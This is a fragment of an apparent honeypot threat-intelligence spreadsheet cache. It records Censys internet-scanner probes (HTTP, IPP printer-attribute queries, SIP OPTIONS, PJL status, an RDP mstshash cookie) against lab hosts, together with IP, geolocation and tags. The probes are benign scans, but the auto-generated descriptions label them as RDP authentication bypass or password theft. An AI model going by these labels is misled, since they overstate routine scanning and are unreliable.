B_MYSQL_H16&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_IRC_H23&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_RDP_H5&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_IPP_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_POP3_H20&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_IPP_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;80&amp;&amp;143&amp;&amp;6379&amp;&amp;NA&amp;&amp;445&amp;&amp;631&amp;&amp;3389&amp;&amp;3306&amp;&amp;5432&amp;&amp;35632&amp;&amp;25&amp;&amp;443&amp;&amp;4775&amp;&amp;6667&amp;&amp;1080&amp;&amp;1433&amp;&amp;110&amp;&amp;5900&amp;&amp;49534&amp;&amp;48075&amp;&amp;23&amp;&amp;21&amp;&amp;389&amp;&amp;9100&amp;&amp;47746&amp;&amp;50270&amp;&amp;37004&amp;&amp;36940&amp;&amp;43206&amp;&amp;41984&amp;&amp;54152&amp;&amp;58420"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys Inc"/>
    <s v="None"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:{'command': '*IDN?', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_HTTPS:{'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,59602)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=48795'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '156.244.8.69:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.8.69:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.115.66:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.97.67:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,55382)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.233.76.135:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,50604)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=38695'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=53912'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=45985'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,38608)}&amp;&amp;{Data_HTTP:{'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=60348'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,51504)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.138.110:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.138.110:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=56586'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.211.202.140:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=40403'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '77.91.74.218:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,58090)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=45975'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://77.91.74.218:631/ipp|ATTR requested-attributes all'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a28e:7dd5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High&amp;&amp;Medium"/>
    <s v="An attacker is attempting to bypass RDP authentication by setting a malicious cookie named MSTSHASH, which can potentially lead to unauthorized access. This may be an attempt to exploit a weakness in the server's authentication mechanism. The attacker is manipulating the session hash. &amp;&amp; This data suggests an attacker is attempting to exploit a vulnerability in network printing services, likely scanning for vulnerable printers on the network and probing them with malicious traffic, possibly as part of a larger attack campaign. The data indicates a remote connection attempt from a suspicious IP address to a printer service, which may be used for unauthorized access or data exfiltration. &amp;&amp; The data suggests a potential attack on an IPP service, where an unauthorized device is attempting to retrieve printer attributes from a server located at IP address 77.91.74.218. The request includes specific attribute settings and a unique printer URI. This could be indicative of reconnaissance or exploitation activity. &amp;&amp; Possible malicious activity involves a remote request to gather information about a printer, specifically its attributes and settings. The request includes details about the language and character set to be used in the communication. This could be part of a reconnaissance or probing attempt to identify vulnerabilities in a network. &amp;&amp; Possible malicious activity involves unknown or unverified sender attempting to send SMTP messages, potentially spamming or phishing victims. This could be part of a larger email-based attack campaign. It may indicate a compromised system sending unsolicited emails from an unknown source."/>
    <s v="Password Steal"/>
  </r>
  <r>
    <x v="53"/>
    <x v="53"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T21:26:21"/>
    <d v="2023-12-21T10:08:25"/>
    <d v="2025-04-30T21:26:21"/>
    <n v="363"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_IRC_H44&amp;&amp;SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MYSQL_H3"/>
